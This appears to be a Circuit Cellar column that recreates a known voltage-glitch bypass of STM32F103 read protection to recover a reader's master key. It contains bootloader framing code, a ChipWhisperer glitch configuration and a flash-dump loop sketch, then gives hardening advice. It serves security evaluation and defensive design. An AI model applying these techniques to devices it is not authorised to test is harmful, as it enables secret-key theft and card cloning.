Take a look at a specific device that relied on an older STM32F1 device to store sensitive security keys. We recreate existing work showing the vulnerability and then look at how we could make the system more secure.
I recently was involved with a project using an STM32F103 microcontroller, where the security of a system relied on the “code read protection” features of this microcontroller. This happened because a critical encryption key was stored in the flash memory. The system in question used the architecture shown in Figure 1. At a high level, this system used a secure smart card to store some trusted application data. To avoid simple attacks, the cards use unique keys per card (and even per memory segment, as in the card here). This means the reader needs a way of determining the encryption key in use with the card. With a shared encryption key, the reader application can establish a secure channel to read the application data without someone sniffing it.
Ideally, we’d solve this problem with public-key cryptography, which would allow the reader to validate that the card came from a trusted source, and then we could perform a key exchange without relying on some secret master key. But as with many highly constrained systems, we don’t get everything we want, so instead the system relies on a key diversification function. This takes a secret master key and uses some combination of the card ID and other features to derive a unique diversified key. The problem is that we now need to handle a master key, and that key will be shared among some group of cards. In my case, it meant the security of the system rested on the code read protection of the STM32F1 microcontroller storing the master key along with the key diversification function.
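The actual diversification function in this system isn't disclosed, but the general shape is easy to sketch. The function name, the HMAC-SHA256 construction, and the all-zero master key below are illustrative assumptions only; production schemes (NXP's AN10922, for example) typically use AES-CMAC instead:

```python
import hmac
import hashlib

def diversify_key(master_key: bytes, card_uid: bytes, segment: int) -> bytes:
    """Derive a per-card, per-segment key from the shared master key.

    Illustrative stand-in for the real (undisclosed) scheme: HMAC-SHA256
    over the card UID and segment number, truncated to a 128-bit key.
    """
    context = card_uid + segment.to_bytes(1, "big")
    return hmac.new(master_key, context, hashlib.sha256).digest()[:16]

# The reader holds master_key; each card only ever holds its own derived keys.
master_key = bytes(16)  # placeholder all-zero master key
k1 = diversify_key(master_key, bytes.fromhex("04a1b2c3d4e5f6"), 0)
k2 = diversify_key(master_key, bytes.fromhex("04a1b2c3d4e5f6"), 1)
assert k1 != k2 and len(k1) == 16
```

The important property is visible even in this toy version: every derived key depends on the master key, so anyone who extracts the master key from a reader can derive the key for any card and segment.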
I’ve discussed the ability to bypass code read protection on other devices before, such as demonstrating how the code read protection of the NXP LPC1114 could be bypassed in “Recreating Code Protection Bypass: An LPC MCU Attack” (Circuit Cellar #338, September 2018). I touched on the STM32F series in particular in “Verifying Code Readout Protection Claims” (Circuit Cellar #336, July 2018), where I discussed how a glitch might be applied, but never actually tested this on hardware. In this article, I’m going to show you how I picked up my previous work and finished the actual attack. It also proves my claim from the previous article: we don’t always need to do the full attack to convince ourselves that there could be a problem!
STANDING ON THE SHOULDERS OF GIANTS
For the STM32F1 in particular, I had several examples of successful attacks to reference. The most important was a 2019 paper called “Shaping the Glitch”, which detailed an attack on the same STM32F103 device. The demonstration I’ll be doing effectively recreates this work, so I’m not introducing any new vulnerability in this article.
But if you want more examples, several other references also show attacks on this device. Mark Cardinal posted an example of performing this attack using a low-cost iCE40 FPGA board in 2018, and a separate blog post titled “Read Secure Firmware from STM32F1xx Flash Using ChipWhisperer” detailed another recreation. Attacks on similar STM32F devices have been shown in the presentations Wallet.Fail and Chip.Fail. Finally, a recent video by Joe Grand entitled “How I hacked a hardware crypto wallet and recovered $2 million” shows the use of an attack on the STM32F2 to recover cryptocurrency stored in a hardware wallet.
Why highlight all these previous examples of this glitch?
I want to emphasize that the fact that the code read protection of the STM32F103 device could be bypassed should not be surprising to you. Nor is anything in this column novel. But when it comes to security, I still find people want to treat these issues as if they should be hidden away. Instead, we need to be realistic with our choices of security features and design our systems with the knowledge that code read protection may not stop even a moderately dedicated attacker.
ABOUT READ PROTECTION
As mentioned, I discussed how the STM32 code read protection works in my July 2018 column. But as that was four years ago, you might not remember the details! So, I’ll summarize the important bits here.
The STM32F series uses a specific address in flash memory to hold what is called an “option byte”. Depending on the value of that byte, various features are enabled or disabled. This includes the ability to disable debug (JTAG) access, and the ability to prevent the built-in bootloader from accessing flash memory. The STM32F series has a convenient “permanent” bootloader that cannot be erased. This is great for development and in-field updates, but it also means an attacker will always have access to the bootloader (entering it requires setting a pin high, so it might require some hardware modifications).
For the STM32F1, the option byte only turns flash memory protection on or off; later devices such as the STM32F2 let you choose whether to also disable the bootloader and JTAG (though as shown in talks such as Wallet.Fail, this can be bypassed). I’ll be using the bootloader to attempt to perform a read from the device. The bootloader flow is shown in Figure 2. You’ll notice that if the read protection is active, the bootloader should respond with a NAK to my read request.
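The framing of that read request is worth seeing concretely. Per ST's AN3155 application note, every command byte is followed by its XOR complement, and the address and length fields carry their own checksums. These small helpers build the frames (they are protocol sketches only; the serial plumbing around them is not shown):

```python
ACK, NAK = 0x79, 0x1F  # bootloader acknowledge / not-acknowledge bytes

def cmd_frame(cmd: int) -> bytes:
    """Command byte followed by its XOR complement (AN3155 framing)."""
    return bytes([cmd, cmd ^ 0xFF])

def addr_frame(addr: int) -> bytes:
    """Four address bytes, MSB first, followed by an XOR checksum."""
    b = addr.to_bytes(4, "big")
    return b + bytes([b[0] ^ b[1] ^ b[2] ^ b[3]])

def length_frame(nbytes: int) -> bytes:
    """(N - 1) and its complement; the bootloader then returns N bytes."""
    n = nbytes - 1
    return bytes([n, n ^ 0xFF])

# Read Memory is command 0x11, so its complement is exactly the 0xEE
# byte the glitch timing is referenced against.
READ_MEMORY = 0x11
assert cmd_frame(READ_MEMORY) == b"\x11\xee"
```

With read protection active, the device answers 0x1F (NAK) immediately after that 0xEE byte; the whole point of the glitch is to turn that response into 0x79 (ACK) so the address and length frames are accepted.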
As previously disclosed, we can simply try to insert a glitch after the read request and see if we get an ACK instead of a NAK. In my July 2018 article, I checked whether the glitch might work by simply jumping into the bootloader after the check happened, and that showed I could dump the memory that way. But I never applied the glitch itself. In this article we’re going to close the loop and prove that indeed the results from four years ago should have made us skeptical of the bootloader security.
GLITCHING TO FREEDOM
In my case, I’m using a crowbar voltage glitch generated by the ChipWhisperer-Husky (the same attack has been demonstrated with the ChipWhisperer-Lite, the ChipWhisperer-Pro, and other methods). The important information is where the glitch should be inserted, and then how we’ll time that specific location.
Luckily, the previous work answered both of these: we simply need to insert the glitch after sending the 0xEE byte as part of the read command. In the blog post on prog.world (see Resources), a ChipWhisperer-Pro is used; here I’m using the lower-cost ChipWhisperer-Husky. Both allow triggering on a UART byte.
A custom bitstream for the ChipWhisperer-Pro is needed due to the even parity requirement of the bootloader; in performing this example, this modification was the most difficult part of the task! But looking at the example waveform of the inserted glitch in Figure 3, you’ll notice that you could also trigger on the first rising edge, making this attack possible with simpler devices such as the ChipWhisperer-Lite (which requires a rising edge trigger for the glitch). Because the glitch is always triggered from a serial command, the timing will be very consistent.
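For reference, the rising-edge variant needs only a few lines of the ChipWhisperer Python API. This is a sketch rather than my exact setup: the attribute names follow the ChipWhisperer-Lite/Pro API (the Husky exposes slightly different ones, such as scope.glitch.enabled), and all the numeric values are placeholders you would sweep during tuning:

```python
# Hardware configuration sketch only; requires an attached ChipWhisperer.
import chipwhisperer as cw

scope = cw.scope()
scope.glitch.clk_src = "clkgen"          # derive glitch timing from the scope clock
scope.glitch.output = "glitch_only"      # drive the crowbar MOSFET directly
scope.glitch.trigger_src = "ext_single"  # one glitch per external trigger edge
scope.glitch.width = 40                  # crowbar width, % of a clock period (tune)
scope.glitch.offset = -10                # fine phase offset within the period (tune)
scope.glitch.ext_offset = 100            # clock cycles from trigger to glitch (tune)
scope.glitch.repeat = 10                 # stretch the crowbar over several cycles (tune)
scope.io.glitch_lp = True                # enable the low-power crowbar transistor
scope.arm()                              # the next trigger edge fires the glitch
```

The sweep over width, offset, and ext_offset is where the real work happens; once a working region is found, the UART-referenced trigger keeps it stable across reads.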
You could also easily perform this work using an embedded microcontroller to send the UART commands. A Raspberry Pi Pico, for example, could implement the bootloader protocol, and because the Pico knows when the byte is being sent, it has a perfect reference for the trigger. Such a platform would allow the PicoEMP I discussed in my March 2022 issue to be used for implementing this attack as well.
In my example, the setup looks like the one shown in Figure 4. The STM32F1 was removed from the target PCB and placed into a socket. This was required because entering the bootloader mode needs a few strapping pins; on the PCB those pins were not available, and it was simply easier to remove the entire chip than to modify the PCB. Removing the chip also meant I could perform some basic evaluation on a device I controlled, and I could be confident that the parameters wouldn’t change very much when simply swapping the device in the socket. If you instead modified the target PCB, you might need to adjust the parameters due to variations in the target PCB or your modifications to it.
For this glitch, we simply use the bootloader and request readout of a 256-byte block (the bootloader reads a maximum of 256 bytes at a time). We need to glitch each and every read request. In my example, there is about a 20% success rate per glitch attempt. When the glitch fails, we sometimes need to power cycle the device, as it fully crashes the bootloader. These crashes slowed things down, but overall reading out the entire 256KB chip took about 4 hours (that’s about 1,000 successful glitches). This is almost a negligible amount of time when we consider the threat model, since with that time investment we recover the master key used by a large group of card readers.
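Once the glitch parameters are found, the read-out loop itself is straightforward. This sketch shows its structure under stated assumptions: read_block and power_cycle are hypothetical callbacks standing in for the real ChipWhisperer and serial plumbing, and the retry bound is arbitrary:

```python
FLASH_BASE = 0x08000000
FLASH_SIZE = 256 * 1024
BLOCK = 256

def dump_flash(read_block, power_cycle, max_tries=200):
    """Glitch-and-retry loop for dumping protected flash.

    `read_block(addr)` is assumed to arm the glitch, send the bootloader
    read command, and return 256 bytes on a successful glitch, None on a
    NAK, or raise TimeoutError when the bootloader has crashed.
    """
    image = bytearray()
    for addr in range(FLASH_BASE, FLASH_BASE + FLASH_SIZE, BLOCK):
        for _ in range(max_tries):
            try:
                data = read_block(addr)
            except TimeoutError:
                power_cycle()  # crashed bootloader: reset and retry
                continue
            if data is not None:
                image += data  # glitch landed; move to the next block
                break
        else:
            raise RuntimeError(f"giving up at {addr:#010x}")
    return bytes(image)
```

At a 20% per-attempt success rate, the expected cost is around five attempts per block, or very roughly 5,000 attempts across the 1,024 blocks of a 256KB part, consistent with the few-hour runtime once crashes and power cycles are included.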
SECURE THE SYSTEM
Now that we’ve seen how the STM32F1 shouldn’t be trusted for critical secrets, what would I change in the design? The single most valuable solution for this system would be to avoid the use of a shared key stored in microcontroller memory.
As mentioned at the beginning of this article, a system using public-key cryptography could keep the sensitive secrets entirely in the smart card device (which is designed to be secure against the types of attacks I am discussing). But if you are working with an already deployed system, you may not be able to redesign the architecture and want to use a shared key more securely. This means ensuring that both sides of the system are equally secure—so matching the secure smart card with a secure “something” in the reader.
The next solution would be to use a secure method of storing the key. But if you pair that secure storage with the same STM32F1 and perform the cryptographic operations on the STM32F1, you may still leave the key easily available. This is because the attacker can simply read the key out of SRAM instead of flash memory (and the STM32F1 allows SRAM read access from a debugger, so any key in SRAM is easily available).
An upgrade here would be to at least work with a “crypto offload” product. A popular choice is the Microchip ATECC608B, which can perform many operations (including standard AES-ECB) using keys that cannot easily be read out. But as this doesn’t encompass the full key diversification algorithm, there is a risk that an attacker can use an ATECC608B as an “oracle” to generate the diversified key for any given card, without the attacker ever knowing the secret master key.
The ATECC608B is still worth mentioning for its low cost (less than $1), which makes it incredibly good value. In these days of chip shortages, it also means you may be able to change your main processor if required, since you rely only on the security features of the ATECC608B and not of whatever processor you designed in at the time. For our specific use case, however, the best solution would be a purpose-built device that mates with the smart card, such as the NXP SAM AV3 chip. This is designed not as a general-purpose device, but as a way of solving the “reader security” problem by matching the level of security present on the smart card with the same level on the reader.
This offloads the algorithms that are used for the key diversification purpose along with the secure communications algorithms from a microcontroller to the SAM AV3. An attacker could still use a programmed SAM AV3 device as an oracle, but they would be limited to only reading from legitimate cards. This would not allow them to clone the cards, since they have no way of generating the diversified key, and the SAM AV3 is only performing reader functions.
I show this arrangement in Figure 5. You’ll notice I haven’t called the channel between the application and the SAM AV3 a secure channel. This is because the STM32F1, as we discovered here, doesn’t have a way of securely storing secrets, so building a truly “secure channel” will be a challenge. We could still use encrypted communication between the AV3 and STM32F1 to prevent an attacker from simply sniffing the communication openly, but a dedicated attacker could clone the STM32F1 to fully emulate whatever security mechanisms we implemented inside it. Ultimately, if we are keeping similar hardware, we are going to accept some level of exposure of the secrets. But exposing the data stored on individual cards seems less serious than exposing the master key shared by a large group of cards.
SECURITY EVALUATION AND YOU
Hopefully, in this article, I’ve given you a bit more of a hands-on example of how you can validate the security of a standard microcontroller, and more importantly the steps you can take to secure your system. The single most important aspect here is a realistic view of the security you’ll accomplish—if you plan from the start to trust only a small part of your design, your overall life will be much easier.
The example here had to trust two devices, both of them accessible to the end-user—the smart card and the reader. While both of these devices are subject to low-level hardware attacks, it turned out the reader device was trivial to attack, negating the excellent security offered by the smart card. If we could change the architecture such that the security key on the reader side was held in a backend system, it would not be accessible to a low-level hardware attack.
Sometimes this isn’t possible, and instead, we need to use devices specifically designed to securely store the secrets. I gave you two examples of them here—the Microchip ATECC608B (useful for many generic purposes), along with the NXP SAM AV3 (targeted more toward a reader interface).
RESOURCES
“Recreating Code Protection Bypass: An LPC MCU Attack” (Circuit Cellar #338, September 2018)
“Verifying Code Readout Protection Claims” (Circuit Cellar #336, July 2018). https://circuitcellar.com/archive-article/verifying-code-readout-protection-claims/
 Claudio Bozzato, Riccardo Focardi, and Francesco Palmarini. “Shaping the Glitch” (2019). https://tches.iacr.org/index.php/TCHES/article/download/7390/6562/
 Mark Cardinal. “Glitching STM32F103 with an iCE40 ‘iCEstick’ FPGA” (2018). https://github.com/unprovable/glitch-stm32
 “Read Secure Firmware from STM32F1xx Flash Using ChipWhisperer”. https://prog.world/read-secure-firmware-from-stm32f1xx-flash-using-chipwhisperer/
 Thomas Roth, Josh Datko, and Dmitry Nedospasov. “Wallet.Fail” (2018). https://wallet.fail
 Thomas Roth, Josh Datko, and Dmitry Nedospasov. “Chip.Fail” (2019). https://chip.fail/
 Joe Grand. “How I hacked a hardware crypto wallet and recovered $2 million” (2022). https://www.youtube.com/watch?v=dT9y-KQbqi4
PUBLISHED IN CIRCUIT CELLAR MAGAZINE • JULY 2022 #384
Colin O’Flynn has been building and breaking electronic devices for many years. He is an assistant professor at Dalhousie University, and also CTO of NewAE Technology, both based in Halifax, NS, Canada. Some of his work is posted on his website.